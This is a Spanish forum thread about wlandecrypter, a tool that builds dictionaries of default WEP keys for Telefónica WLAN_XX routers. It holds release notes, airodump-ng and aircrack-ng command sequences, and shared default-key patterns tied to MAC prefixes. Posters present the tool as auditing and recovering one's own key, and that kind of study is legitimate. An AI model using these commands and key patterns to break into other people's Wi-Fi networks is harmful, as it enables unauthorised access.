- Wlandecrypter genera claves por defecto para router conocidos de telefonic. diccionario00 es sólo un ejemplo, cada uno pone el nombre que le da la gana al fichero donde va a guardar las claves que genere wlandecrypter.
- captura.cap es sólo otro ejemplo de nombre (como si lo llamo petete) donde guardar los datos capturados con airodump-ng.
No puedo más que recomendarte que leas https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/mi-primera-auditor237a/ y así aprendas un poco que es lo que estás haciendo cuando usas estos programas y cómo usarlos.
-
A ver si sacan un diccionario para las WLAN_XXXX
A mi alcance hay tres y pongo los datos
WLAN_AC8A 64:68:0C:08:AC:8D
WLAN_67AE 64:68:0C:1A:67:B1
El siguiente no se si es de telefónica o no
WLAN_P2_3 E0:91:53:0C:A8:36
Un saludo
-
Hola, os cuento como me ha ido.
He instalado el wlandecrypter en el livecd, y he realizado los siguientes pasos con el correspondiente error.
1º Ejecuto esto: airodump-ng -w captura --channel 6 ath0
2º Ejecuto esto: wlandecrypter E0:91:53:XX:XX:XX WLAN_XX diccionario00.txt
y me sale lo siguiente:
- ESSID:WLAN_XX
- BSSID: E0:91:53:XX:XX:XX
- Modelo: Xavi_7968-solos_4610_RD_/_461X
- Fichero de claves: diccionario00
- Fichero guardado: ok
3º Ejecuto este último comando: aircrack-ng -b E0:91:53:XX:XX:XX -w diccionario00.txt -K captura.cap
Si lo ejecuto así me da error en la K.
Si ejecuto en vez de ese comando, este otro: aircrack-ng captura.cap -w diccionario00
entonces me dice lo siguiente:
opening captura.cap
open failed: no such file or directory.
¿Alguien sabe porque me dice eso? Me he quedado atascado en ese punto. Muchas gracias de nuevo por vuestra ayuda.
Un saludo.
-
tienes que poner la ruta de donde tienes los archivos ya te lo dijeron un poco mas arriba
aircrack-ng 00:00:00:00:00:11 /ruta/archivo/cap-00.cap -w /ruta/tu/diccionario
un saludo
-
¿Alguién sabe marca y modelo del router con mac 40:4A:03:xx:xx:xx o puede confirmar si es un ZyXEL P-660 ?
-
te refieres a la ruta donde descomprimi mi wlandecrypter? Gracias
-
niroz compilas la 1.3?
meter patron nuevo 40:4AXXXXXXX
Arreglar tema diccionario HXXXXXXXXXX?? para las 00:18:02
-
Añadiré 40:4A:xx y otro patrón para la 00:1A:2B.
Sobre las 00:18:02 simplemente se quitarán porque no hay un patrón definido.
-
Niroz&Me|on donde vas poniendo la version actualizada con las ultimas Macs que dices?? en donde me comentastes de modulos de wifiway???
Saludos.
Alfon6
-
Aun no está, cuando este lista la pondré aquí. Creo que hoy o mañana... porque aparte de añadir mac nueva quiero hacer un cambio en el código sobre el orden en que se escriben las claves en el diccionario.
Si veo que puedo tardar al menos pondré entre hoy y mañana una versión con el patrón y la mac nueva.
-
Aun no está, cuando este lista la pondré aquí. Creo que hoy o mañana... porque aparte de añadir mac nueva quiero hacer un cambio en el código sobre el orden en que se escriben las claves en el diccionario.
Si veo que puedo tardar al menos pondré entre hoy y mañana una versión con el patrón y la mac nueva.
compadre eres un artista
-
Muy bien Niroz&Me|on sigue así.
saludos.
Alfon6
-
WLANDECRYPTER v1.3.1
____________________________________________________________________
Novedades
- Añadida nueva Mac 40:4A:03 y nuevo patrón de claves para las Mac 00:1A:2B
- Ahora Wlandecrypter escribe las claves más probables primero, al principio del
diccionario, para router conocidos y con una WLAN_XX determinada. Así la clave correcta
puede ser encontrada mucho antes en proyectos como Wlanreaver.
____________________________________________________________________
USO
uso: wlandecrypter [-e] <BSSID> <ESSID> [fichero]
wlandecrypter -a <ESSID> [fichero]
wlandecrypter -l
-l : lista en pantalla todos los routers conocidos
-a : genera diccionario para todos los routers y una WLAN_XX
-e : genera diccionario experimental para routers desconocidos
Si <ESSID> = WLAN_?? genera todas las redes desde WLAN_00 a WLAN_FF
--> LEED EL README.TXT <--
____________________________________________________________________
OBSERVACIONES
- Las opciones -e y -a no se ejecutan a la vez, wlandecrypter sólo llevará a cabo la
primera que encuentre en la línea de comandos.
- Opción -e experimental: Ya que en algunos las claves siguen el patrón X112233xxxxAB para
por ejemplo un router con mac 11:22:33:xx:xx:xx y WLAN_AB, e igual en algunos Comtrend,
Zyxel, etc, porque no probar y ver que pasa con otros que puedan aparecer y no estén aun
en la lista.
- Opción -a: Genera las claves de un WLAN_XX para todos los routers conocidos (que están en
la lista) sin tener en cuenta la bssid. Por ejemplo puede servir para un router no conocido,
distinto a los entregados por el operador, pero en el que se haya mantenido la configuración
del original.
- Un diccionario con la opción -a y wlan_?? ocupará más de 4 GB de disco duro, ¿realmente
necesitas eso Y PUEDES MANEJARLO?.
- Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
____________________________________________________________________
EJEMPLOS
- Ejemplo1: wlandecrypter -e 00:11:22:33:44:55 wlan_aa prueba
Genera Diccionario de nombre 'prueba'con C001122xxxxAA, X001122xxxxAA, Z001122xxxxAA,
T001122xxxxAA y H001122xxxxAA
- Ejemplo2: wlandecrypter -a wlan_aa prueba2
Genera el diccionario de nombre 'prueba2' para cada BSSID, es decir, para cada router conocido
y WLAN_AA. El diccionario ocupará 19,2 MB en disco duro.
____________________________________________________________________
INSTALACION
Compilación:
make clean && make
Instalación:
sudo make install
____________________________________________________________________
Descarga
http://www.wifiway.org/archivos/wlandecrypter-1.3.1.tar.gz
Módulo (por Garcad) -> http://dl.dropbox.com/u/6244383/Wifiway/Modulos/wlandecrypter-1.3.1.lzm
Mac OS X (intel) -> http://www.box.net/shared/shez23iybu
Windows -> http://www.box.net/shared/qle4exaod3
____________________________________________________________________
-
ola a todos Soys unos makinas gracias ¡¡¡¡
Ahora mi pregunta .... (Niroz&Me|on ) lo del modulo wlandecrypter 1.3.1 Sirve para el Wifislax 3.1 ?¿?¿ Se Añade al wifislax 3.1 Booteable por Usb ??? Si es asin me puedes exlicar :)
-
ola a todos Soys unos makinas gracias ¡¡¡¡
Ahora mi pregunta .... (Niroz&Me|on ) lo del modulo wlandecrypter 1.3.1 Sirve para el Wifislax 3.1 ?¿?¿ Se Añade al wifislax 3.1 Booteable por Usb ??? Si es asin me puedes exlicar :)
Supongo que el módulo debe servir también para Wifiway y que no debe haber problemas tampoco en instalar con el make y el make install.
De todas formas por favor, mejor pregunta por la sección de wifislax y/o wfiway, que yo lo que suelo usar es Xubuntu o Ubuntu + la suite aircrack-ng tecleando los comandos a pelo en un terminal.
-
=mente Gracias Por responder tan rapidamente :) ........
-
WLANDECRYPTER v1.3.1
____________________________________________________________________
Novedades
- Añadida nueva Mac 40:4A:03 y nuevo patrón de claves para las Mac 00:1A:2B
- Ahora Wlandecrypter escribe las claves más probables primero, al principio del
diccionario, para router conocidos y con una WLAN_XX determinada. Así la clave correcta
puede ser encontrada mucho antes en proyectos como Wlanreaver.
____________________________________________________________________
USO
uso: wlandecrypter [-e] <BSSID> <ESSID> [fichero]
wlandecrypter -a <ESSID> [fichero]
wlandecrypter -l
-l : lista en pantalla todos los routers conocidos
-a : genera diccionario para todos los routers y una WLAN_XX
-e : genera diccionario experimental para routers desconocidos
Si <ESSID> = WLAN_?? genera todas las redes desde WLAN_00 a WLAN_FF
--> LEED EL README.TXT <--
____________________________________________________________________
OBSERVACIONES
- Las opciones -e y -a no se ejecutan a la vez, wlandecrypter sólo llevará a cabo la
primera que encuentre en la línea de comandos.
- Opción -e experimental: Ya que en algunos las claves siguen el patrón X112233xxxxAB para
por ejemplo un router con mac 11:22:33:xx:xx:xx y WLAN_AB, e igual en algunos Comtrend,
Zyxel, etc, porque no probar y ver que pasa con otros que puedan aparecer y no estén aun
en la lista.
- Opción -a: Genera las claves de un WLAN_XX para todos los routers conocidos (que están en
la lista) sin tener en cuenta la bssid. Por ejemplo puede servir para un router no conocido,
distinto a los entregados por el operador, pero en el que se haya mantenido la configuración
del original.
- Un diccionario con la opción -a y wlan_?? ocupará más de 4 GB de disco duro, ¿realmente
necesitas eso Y PUEDES MANEJARLO?.
- Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
____________________________________________________________________
EJEMPLOS
- Ejemplo1: wlandecrypter -e 00:11:22:33:44:55 wlan_aa prueba
Genera Diccionario de nombre 'prueba'con C001122xxxxAA, X001122xxxxAA, Z001122xxxxAA,
T001122xxxxAA y H001122xxxxAA
- Ejemplo2: wlandecrypter -a wlan_aa prueba2
Genera el diccionario de nombre 'prueba2' para cada BSSID, es decir, para cada router conocido
y WLAN_AA. El diccionario ocupará 19,2 MB en disco duro.
____________________________________________________________________
INSTALACION
Compilación:
make clean && make
Instalación:
sudo make install
____________________________________________________________________
Descarga
http://www.wifiway.org/archivos/wlandecrypter-1.3.1.tar.gz
Módulo (por Garcad) -> http://dl.dropbox.com/u/6244383/Wifiway/Modulos/wlandecrypter-1.3.1.lzm
____________________________________________________________________
Gracias Niroz&Me|on ;)
Descargado e instalado en Ubuntu 9.10.
Saludos
-
Una pregunta.. :D Aunk no vaia aki si no molesta.... Tengo una notebook Acer Aspire Con XP, Kiero ponerle Ubuntu, Pero nose komo :S.... Si instalas Ubuntu o cualkier linux, Se kedaria como el Wifislax, La misma forma de usar los programas cuando se los insertas i como seria ??? Espero noser tanta molestia :)
-
peña
En wifiway si usas dispositivos usb el nombre del dispositivo rausb0, no cambia a otro cuando se pone en modo monitor, en ubuntu si lo hace cambia a mon0, mon1, mon2, dependiendo del comando hay que usar un nombre u otro, inclusive los dos.
En wifiway es mas sencillo que en ubuntu con rausb0 seria suficiente, cuando lo tienes claro es sencillo en ambos.
Salu2
-
Gracias Por responder :D ..... Ya mirare de instalarme el ubuntu o el wifiway :) Gracias "Garcad"
-
Instalado y funcionando en Jaunty ;D
-
Saludos gente.
Mi router de telefonica es algo curioso... tiene WLAN_XXXX con cifrado WEP ^-^ ^-^. Aqui os pongo mas datos. Es un comtrend de los nuevos.
WLAN_BF91 MAC 64:68:0C:
Key C64680CXXBF91 Donde XX serian los unicos numeros a averiguar del patron.
Me ha llamado la atencion porque mi amigo tiene Jazztel, con el mismo router, y la clave empieza por E64680CXXXXZZ donde ZZ vendria del SSID.
Pero lo que mas me ha llamado la atencion es que sea WLAN_XXXX y sea WEP... cosas de la vida...
Saludos, espero que os sirva. ;)
-
Esta no es una de las redes del wlandecrypter.
Hay hilos sobre las redes WLAN_XXXX de Timofonica por el foro.
-
Esta no es una de las redes del wlandecrypter.
Hay hilos sobre las redes WLAN_XXXX de Timofonica por el foro.
Jose Css, creo que no has leido bien, ya se que las WLAN_XXXX son otro tema, pero curiosamente, mi router por defecto trae WLAN_XXXX y cifrado WEP. Con lo cual creo que es una informacion adicional.
Yo se de sobra que la mayoria de WLAN_XXXX vienen con WPA, pero parece ser que a telefonica se le ha escapado alguna remesa de Routers Comtrend con WEP por defecto, y he tenido la suerte que ha caido en mis manos y os puedo informar. Aunque tambien supongo que no habran muchos de este tipo, pero seria una opcion a estudiar, por si interesa poner en el Wlandecrypter una excepcion para WLAN_XXXX con wep o si sale un Wlan4xdecripter para WPA, se pueda crear diccionario para Wlan_XXXX con WEP, aunque no se si habran muchas como la mia, pero eso si...con el metodo tradicional la WEP sale...
Y da la casualidad que mi amigo tiene un comtrend de Jazztel y pese a tener distinta MAC, la clave, exceptuando el primer caracter que es un E y el mio un C, el principio de la clave es identica: (mi router) C64680C (el de mi amigo) E64680C.
Lo que si que esta claro es que telefonica pese a implantar WPA, aun sigue tirando de WEP. Y hace 2 semanas que me ha llegado el router...
Saludos y espero que os sirva la informacion.
-
Buenas:
@chatkill: ¿El cuarto par del BSSID son las 2 XX que has puesto tu en la clave WEP?
Mandame por privado cuál sería la clave WPA en caso de ponerla de forma automática tu router
Un saludo
ChimoC
-
Saludos gente.
Mi router de telefonica es algo curioso... tiene WLAN_XXXX con cifrado WEP ^-^ ^-^. Aqui os pongo mas datos. Es un comtrend de los nuevos.
WLAN_BF91 MAC 64:68:0C:
Key C64680CXXBF91 Donde XX serian los unicos numeros a averiguar del patron.
Me ha llamado la atencion porque mi amigo tiene Jazztel, con el mismo router, y la clave empieza por E64680CXXXXZZ donde ZZ vendria del SSID.
Pero lo que mas me ha llamado la atencion es que sea WLAN_XXXX y sea WEP... cosas de la vida...
Saludos, espero que os sirva. ;)
Muchas gracias por la info chatkill
-
Esta no es una de las redes del wlandecrypter.
Hay hilos sobre las redes WLAN_XXXX de Timofonica por el foro.
Jose Css, creo que no has leido bien, ya se que las WLAN_XXXX son otro tema, pero curiosamente, mi router por defecto trae WLAN_XXXX y cifrado WEP. Con lo cual creo que es una informacion adicional.
Weno, yo me referia a que esto lo pusieras en el otro hilo... porque wlandecrypter es WLAN_XX exclusivo.
De todas formas, gracias por los datos, siempre se agradece tener datos.
PD: Lo de Jazztel esta ya puesto en el jazzteldecrypter, hace tiempo que se conoce y no creo que tenga nada que ver con esto... y hay routers WLAN_XX con clave C64680C y hay routers de JAZZTEL_XX con clave E64680C, ambos con BSSID 00:1A:2B. En fin, que para mi son otro mundo aparte, nada que vern con las WLAN_XXXX.
Pero gracias por el dato ;)
-
Sobre las WLAN_XXXX con cifrado WEP y según lo datos aportados por chatkill de momento se podría usar wlandecrypter con la opción -e y si tenemos una WLAN_XXZZ usar como essid WLAN_ZZ.
Ejemplo:
WLAN_BF91 MAC 64:68:0C:xx:xx:xx
wlandecrypter -e 64:68:0C:aa:aa:aa wlan_91 diccionario
byez.
-
Esto se pone interesante ;D
-
Sí, usan el mismo tipo de clave cuando el router está en modo WEP. Lo que pasa es que la mayoría de las WLAN_XXXX (o al menos las que yo vi) vienen por defecto en WPA.
Saludos
-
¿habra alguna vez algun wlandecrypter para las nuevas wlanxxx?
-
Cuando se encuentre el patron, lo incluiran
-
ya cuando encuentren el patron aunque lo veo casi imposible. De todas fomas yo puedo faciltar captudas con handsake de dos 64:68:0c ..... si ha alguien le sirve de algo.... Ojala salga algo .... :'(
Cuando se encuentre el patron, lo incluiran
-
Mandaselo a algun moderador para incluirlo en el estudio.
Saludos
-
Buenas, queria intentar aportar mi granito de arena al proyecto.
El router tiene WLAN_XXXX con cifrado WPA, lo que pasa es que segun he leido en comentarios anteriores esto no se si va aqui o si tengo que publicar la contraseña o mandarla por privado a *dudux. Por si enteresa la MAC es 64:68:0C:
-
Mandale la info a dudux o a mi tambien me la puedes mandar. No la publiques ene l foro, porque te cantaran las 40 >:D >:D
Saludos
-
ACK ;)
-
un saludo
porfavor se alguien me ayuda yo ha bajado el wifiway-1-final no se como lo voy a instalar
en mi ordenador yo tengo windows 7 ultimate
no se que programas que me faltan para que instalo el wifiway en mi ordenador
un amigo me ha decho que tienes que bajar el linux pero yo no se cuales
cuando pongo descargar linux me salen muchos y no se cuales
mi email janyen_21@hotmail.com
muchisimas gracias
un saludo
-
Pues yo pensaba que tu correo es hoygan_21@suxxxmail.com
No es por ser borde y yo tampoco tengo mucha idea, pero... si estas tan perdido, a lo mejor no deberias instalarlo. Cuantos amigos tendre que se han cargado el Win (o particiones de datos) por hacer el tonto con el Lin.
-
Muy buenas. Me gustaria saber si hay alguna novedad con esta MAC (00:18:02) que se introdujo en la version 1.2 y que se elimino mas tarde.
He estado haciendo pruebas con esta bssid y con essid WLAN_3D, no hay manera de inyectar trafico sin clientes y la unica forma es intentar conectar con otros interfaces y una key falsa con lo cual consigo algunas datas, pero no se si estas datas serviran para su estudio. Tampoco tengo claro quien manufactura estos rotuers, por que tengo entendido que pueden ser Alpha Net o Hauwei. (Hice un ataque con un diccionario creado con la v1.2 y 100IVs sin exito.)
Si puedo aportar las IVs para su estudio solo decirme donde las puedo mandar.
Gracias.
-
Muy buenas. Me gustaria saber si hay alguna novedad con esta MAC (00:18:02) que se introdujo en la version 1.2 y que se elimino mas tarde.
He estado haciendo pruebas con esta bssid y con essid WLAN_3D, no hay manera de inyectar trafico sin clientes y la unica forma es intentar conectar con otros interfaces y una key falsa con lo cual consigo algunas datas, pero no se si estas datas serviran para su estudio. Tampoco tengo claro quien manufactura estos rotuers, por que tengo entendido que pueden ser Alpha Net o Hauwei. (Hice un ataque con un diccionario creado con la v1.2 y 100IVs sin exito.)
Si puedo aportar las IVs para su estudio solo decirme donde las puedo mandar.
Gracias.
Se tomó la decisión de eliminar esa mac (00:18:02:xx:xx:xx Huawei_EchoLife_HG520v) en las versiones posteriores a la 1.2 de wlandecrypter porque al poder comparar la clave de varios de ellos vimos que no siguen un patrón reconocible como los demás routers incluidos en wlandecrypter. Por eso y aunque esté incluido en la v1.2 no sirve para nada el diccionario que se genera.
Sin embargo muchos de los que han podido experimentar con alguno de estos routers han comprobado que antes o después son vulnerables a los ataques combinados clásicos: A0, A1, A2 o A3... Con lo que al conseguir 20.000, 30.000 o 40.000... IVs la clave se obtiene sin diccionario como suele pasar cuando se tiene el router con seguridad WEP.
-
hola a todos hoy me e encontrado con una Wlan de Movistar nueva qe empieza por 00:24:17.... Wlan_6E sabeis algo de esta nueva Wlan?
-
Ahi va una pregunta rapida.
los bssid's E0:91:53:xx:xx:xx siguen el mismo patron que las demas wlans?
quiero decir la pass sera aE09153XXXXnn.
donde a es la marca del ruter y nn viene de los dos ultimos caracteres del essid
correcto?
segunda pregunta rapida. existe algun post, o pagina o lo que fuere, de wlandecrypter donde aparezcan los bssid's que acepta?
gracias de antemano!
-
Ahi va una pregunta rapida.
los bssid's E0:91:53:xx:xx:xx siguen el mismo patron que las demas wlans?
quiero decir la pass sera aE09153XXXXnn.
donde a es la marca del ruter y nn viene de los dos ultimos caracteres del essid
correcto?
segunda pregunta rapida. existe algun post, o pagina o lo que fuere, de wlandecrypter donde aparezcan los bssid's que acepta?
gracias de antemano!
1ª Pregunta: Si.
2ª Pregunta: Los programas tienen ayuda y/o incluyen ficheros leeme.txt, readme.txt, etc..
https://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlandecrypter-0-6-nuevas-macs/msg160802/#msg160802
Comando que lista los routers conocidos: wlandecrypter -l
Sugerencia: Lee más.
Byez.
-
Hola, disculpad mi ignorancia, pero veréis, soy un novato que únicamente instalo el wifiway, y bueno quero actualizar el wlandesencripter, (bien escrito claro jj) lo que ya me ha surgido el primer problema, ¿porque salen en el post principal todas las versiones?
¿Como se instala\n? ¿Lo puedo usar con los programas estos donde no ay que poner códigos? se ve que puedo hacer diccionarios y esas cosas, ¿Cómo los empleo?
Gracias y disculpad que sea un gañan pero no me entero ni papa
-
¿Para cuando wlandecrupter en modulo .TCZ para Beini 1.2.1?, ya que beini es el unico que trabaja con RT3070
Saludos
-
Eso sera mejor que se lo preguntes al señor ZhaoChunsheng que es el que hace beini, digo yo.....
aqui creo que solo se hacen para wifiway/wifislax ???
-
Dudux como va el patron para las wlan_xxxx wpa de telefonica?Tengo el handshake de una llamada wlan_f5f8 si te puede ayudar te lo envio por mp
-
nueva mac
WLAN_XX
00:24:17:XX:XX:XX
dudux esta wlan se puede usar con la version 1.3.1 ? me dice BSSID no valido... hay que esperar a una nueva version? Graciaas
-
hablar con niroz&me|on que es quien actualiza las versiones........
recordar usar el modo experimental antes que nada,,,esperamos el patron en breves
yo estoy intentando sacar WLAN_XXXX ,no quiero handshakes no pienso probar fueerza bruta
estamos mirando de urgar el firmware
-
Hola a todos,
¿Como podemos ayudar los demás? Parece que el algoritmo esta dificil...
Un saludo
-
Bueno os dejo el wlandecrypter con las opciones que comenté hace unos post y la nueva '-a'.
uso: wlandecrypter [-l] <bssid> <essid> [output_file opciOn]
-l: lista en pantalla los routers conocidos.
opciOn:
-e: genera diccionario experimental para routers desconocidos.
-a: genera diccionario para todos los routers conocidos y una WLAN_XX.
<essid> = WLAN_??, para crear diccionario con todas las posibilidades, de 00 a FF.
Echadle un vistazo al README.txt. Ya me diréis lo que falle.
Descarga wlandecrypter_v1.2b-> http://www.box.net/shared/1t9nqygf4r
Nota: Veo que se sigue descargando esta versión, no importa, pero la v1.2 final completa esta disponible desde hace ya tiempo, https://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlandecrypter-0-6-nuevas-macs/msg150204/#msg150204
P.D.: Se puede compilar en tanto en Linux, Win y Mac. Puedo poner ya compilado el binario para Mac.
P.P.D.: Un diccionario con la opción -a y wlan_?? ocupará unos 4,2GB de disco duro, ¿realmente necesitas eso?. Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
HOLA ! e probado amigo pero , no puedo sacar diccionario , puedos auydarme por favor . Gracias
-
Bueno os dejo el wlandecrypter con las opciones que comenté hace unos post y la nueva '-a'.
uso: wlandecrypter [-l] <bssid> <essid> [output_file opciOn]
-l: lista en pantalla los routers conocidos.
opciOn:
-e: genera diccionario experimental para routers desconocidos.
-a: genera diccionario para todos los routers conocidos y una WLAN_XX.
<essid> = WLAN_??, para crear diccionario con todas las posibilidades, de 00 a FF.
Echadle un vistazo al README.txt. Ya me diréis lo que falle.
Descarga wlandecrypter_v1.2b-> http://www.box.net/shared/1t9nqygf4r
Nota: Veo que se sigue descargando esta versión, no importa, pero la v1.2 final completa esta disponible desde hace ya tiempo, https://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlandecrypter-0-6-nuevas-macs/msg150204/#msg150204
P.D.: Se puede compilar en tanto en Linux, Win y Mac. Puedo poner ya compilado el binario para Mac.
P.P.D.: Un diccionario con la opción -a y wlan_?? ocupará unos 4,2GB de disco duro, ¿realmente necesitas eso?. Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
HOLA ! e probado amigo pero , no puedo sacar diccionario , puedos auydarme por favor . Gracias
Lo primero es que bajes la última versión, es la 1.3.1, y luego que expliques que es lo que pasa o que error/es recibes, algo para que sepamos que te sucede...
-
yo estoy intentando sacar WLAN_XXXX ,no quiero handshakes no pienso probar fueerza bruta
estamos mirando de urgar el firmware
Comparto tu opinión y te aplaudo. Fuerza bruta al azar ¡No!.
Después de todo lo que he leído, creo que la brecha está en descubrir los patrones para generar diccionarios con sentido. Lo de atacar los protocolos entre ap y cliente conociendo las diferentes capas implementadas y lo que hay en cada ventana de trama etc etc, parece que queda un poco lejos, por lo menos es la impresión de quienes tenemos pocos conocimientos.
Saludos y éxito.
-
Buenas, soy nuevo en todo esto.
Me he bajado los archivos "wlandecrypter-1.3.1.tar" y "wlandecrypter-1.3.1.lzm".
Pero no se como poner el marcha el programa ni en windows ni en wifislax o wifiway.
Por más que he buscado no he encontrado nada que me haya sacado de dudas.
Alguien puede decirme los pasos, para que un novato nos entienda???
Muchas Gracias.
-
Por más que he buscado no he encontrado nada que me haya sacado de dudas.
Has buscado poco. Tienes que buscar más, y leer mucho más. Lo suficiente como para saber de que estamos hablando.
Wifiway2 ya incluye Wlandecrypter 1.3.1. Si tienes alguna versión anterior de Wifiway, eso que te te has bajado, sirve para actualizarle el Wlandecrypter.
Post Merge: 29-10-2010, 17:03 (Viernes)
Hola a todos,
¿Como podemos ayudar los demás? Parece que el algoritmo esta dificil...
Un saludo
Como nadie te ha contestado, lo voy a hacer yo, dando por buena ésta, tu presentación. Bienvenido al foro. Recuerda que es conveniente pasar por: https://foro.seguridadwireless.net/foro-libre-offtopic
y echar un vistazo a las normas: https://foro.seguridadwireless.net/foro-libre-offtopic/normas-del-foro-20453
Si tienes la suerte de poseer conocimientos y experiencia en estos temas, pues tú mismo irás viendo si puedes aportar algo.
Recordar también que quienes ya aportan sus conocimientos, necesitan materia prima para poder investigar:
ESSID...........................................................
BSSID...........................................................
CANAL..........................................................
CLAVE WEP/WPA ORIGINAL..................
MODELO DE ROUTER.............................
NUMERO DE SERIE (si lo pone).........
FECHA o AÑO (si lo pone)...................
Estos son los datos objetivos para poder afrontar la búsqueda de patrones en las claves que traen por defecto los routers suministrados por cualquier compañía proveedora de servicios. Lo demás, ayuda poco.
Generalmente, los datos figuran en una pegatina en la parte de abajo o en la parte posterior del router.
También sirve una foto de la misma, siempre que sea con buena definición para que se pueda leer.
Quienes puedan y quieran aportar datos, pueden hacerlo ¡POR PRIVADO! a los moderadores.
Saludos.
-
Si es cierto que van a cambiar todas las wlan_xx wep a wlan_xxxx wpa, no entiendo porque siguen saliendo guias programas y tal para las wlan_xx. Yo opino que deberíamos centrarnos todos en averiguar un poco mas acerca de las wlan_xxxx wpa.
-
Si es cierto que van a cambiar todas las wlan_xx wep a wlan_xxxx wpa,
Las que hay ya instaladas no las van a tocar y las que instalan nuevas ya utilizan seguridad WAP y WAP2.
no entiendo porque siguen saliendo guias programas
Porque esto es para aprender a recuperar tu clave WEP y en la actualidad hay mas wep que wap. Si lo que te interesa es la seguridad WAP tambien tienes tutoriales.
Yo opino que deberíamos centrarnos todos en averiguar un poco mas acerca de las wlan_xxxx wpa.
Si la red wlan_xxxx es tuya puedes hacer auditorias en ella sin problemas y obtener tu clave, siempre y cuando la hallas metido en el diccionario que utilizes.
Posdata: Si lo que te refieres es a sacar la clave por fuerza bruta de momento nadie a desvelado como hacerlo aunque ya halla gente que lo halla conseguido.
Saludos
-
Por más que he buscado no he encontrado nada que me haya sacado de dudas.
Has buscado poco. Tienes que buscar más, y leer mucho más. Lo suficiente como para saber de que estamos hablando.
Wifiway2 ya incluye Wlandecrypter 1.3.1. Si tienes alguna versión anterior de Wifiway, eso que te te has bajado, sirve para actualizarle el Wlandecrypter.
Post Merge: 29-10-2010, 17:03 (Viernes)
Hola a todos,
¿Como podemos ayudar los demás? Parece que el algoritmo esta dificil...
Un saludo
Como nadie te ha contestado, lo voy a hacer yo, dando por buena ésta, tu presentación. Bienvenido al foro. Recuerda que es conveniente pasar por: https://foro.seguridadwireless.net/foro-libre-offtopic
y echar un vistazo a las normas: https://foro.seguridadwireless.net/foro-libre-offtopic/normas-del-foro-20453
Si tienes la suerte de poseer conocimientos y experiencia en estos temas, pues tú mismo irás viendo si puedes aportar algo.
Recordar también que quienes ya aportan sus conocimientos, necesitan materia prima para poder investigar:
ESSID...........................................................
BSSID...........................................................
CANAL..........................................................
CLAVE WEP/WPA ORIGINAL..................
MODELO DE ROUTER.............................
NUMERO DE SERIE (si lo pone).........
FECHA o AÑO (si lo pone)...................
Estos son los datos objetivos para poder afrontar la búsqueda de patrones en las claves que traen por defecto los routers suministrados por cualquier compañía proveedora de servicios. Lo demás, ayuda poco.
Generalmente, los datos figuran en una pegatina en la parte de abajo o en la parte posterior del router.
También sirve una foto de la misma, siempre que sea con buena definición para que se pueda leer.
Quienes puedan y quieran aportar datos, pueden hacerlo ¡POR PRIVADO! a los moderadores.
Saludos.
Genail, muchas gracias por tu amabilidad!
-
Que ha pasado con el post de las WLAN_XXXX Y JAZTEL_XXXX????
-
eso eso ;D, que paso con lo de wlan_xxxx y jazztel_xxxx, grax
salu2
-
Aplazado, hay otro post sobre esto, no pregunteis donde no corresponde
-
Pues dime que post es el que habla de eso, que no lo encuentro ^-^
-
Aqui
https://foro.seguridadwireless.net/noticias-wireless/wlan_xxxx-y-jazztel_xxxx/msg180470/?topicseen#msg180470
Y se deja ver ;)
Saludos
-
Hola, hace mucho tiempo que no entro, pero tengo datos sobre un nuevo patron. Estaria bien si alguien lo pudiese confirmar, para actualizar el WLANdec.
BSSID: 00:23:F8*
ESSID: WLAN_20
Canal: 5
WEP: Z404A03????20
Puedo pasar los datos que no he escrito por PM si es necesario.
-
hola a tod@s, tengo en mi casa una wlan_xxxx, y intercambio mis datos por los vuestros, siempre y cuando sean de las wlan_xxxx (con encriptación WPA).
A los interesados que me manden un privado.
SALUDOS!
-
Hola.
Yo no tengo WPAs de esas, como mucho, tengo para cambiar un par de chorizos de cantimpalo??
Salu2 y suerte
-
Hola!! soy nuevo aki, me preguntaba si se incluira la MAC 50:67:F0 para las WLAN_XX en la proxima version del wlandecrypter. Sabeis algo de este tipo de red nunca la habia visto antes, pertenece a los router Zyxel segun vi por otros sitios, intentare aportar datos. Un saludo y gracias.
-
Si, ya hace un tiempo que la tenemos en cuenta para la próxima actualización.
Gracias de todos modos.
-
Si, ya hace un tiempo que la tenemos en cuenta para la próxima actualización.
Gracias de todos modos.
OK gracias por la respuesta. Un saludo.
-
y alguna version ( nueva ) del wlandecrypter para Windows ?
La que esta puesta , no rula al abrirla :S
Nose porque :S
Editado : sera que no funciona en W7 ? solo para W xP?
-
si que funciona, tienes que ejecutarla en una consola y no como una aplicación con GUI, si no sabes como leete este tema, está explicado.
(https://lh4.googleusercontent.com/_y7vqZ4VfkVk/TXJvZjbPCDI/AAAAAAAAAKM/kDqLnRepcPY/s800/Captura4.png)
saludos
-
tenia que posicionarme desde el cmd , en la ruta del directorio y de ahi rular el exe .. ^^ en fin .
Asi se aprende, cada dia una cosa nueva.
gracias drvalium .
Pero tengo otra duda , me da un txt con la claves, pero me pone miles de claves .
No se supone que tiene que ser algo similar como al Wlan_4x?
Porque da tantas y no solo una , dos o varias ?
PD : he seguido la guia que ponia , con opcion -e y tambien -l para selecionar el router...aun asi me da miles de claves.
Hago yo algo mal , o asi esta diseñado el programa ? porque no se si me da tiempo probarlas en una vida ;D
-
esto es la zona de descargas y no la de dudas sobre el uso de nada, utiliza la zona que corresponda a tu sistema operativo, gracias.
un saludo
-
wlandecrypter 1.3.2 (02.02.2011) <www.seguridadwireless.net>
Cambios:
- Añade mac 50:67:F0 y nuevo patrón de claves para la mac 00:23:F8.
- Se escriben las claves más probables primero de todos los patrones de claves
que pueda tener cada mac para routers conocidos y con una WLAN_XX determinada.
Descarga: http://www.box.net/shared/uiuovb159l
MD5: 507fe6988be1a1ee50df92a14cbefaf3
Descripción: Generador de diccionario de claves por defecto para routers Zyxel, Xavy, Comtrend y Thomson. Redes Wlan_XX.
Instalación:
make
make install (o sudo make install)
Desinstalar:
sudo make uninstall
Uso:
wlandecrypter [-e] <BSSID> <ESSID> [fichero]
wlandecrypter -a <ESSID> [fichero]
wlandecrypter -l
-l : lista en pantalla todos los routers conocidos
-a : genera diccionario para todos los routers y una WLAN_XX
-e : genera diccionario experimental para routers desconocidos
Si <ESSID> = WLAN_?? genera todas las redes desde WLAN_00 a WLAN_FF
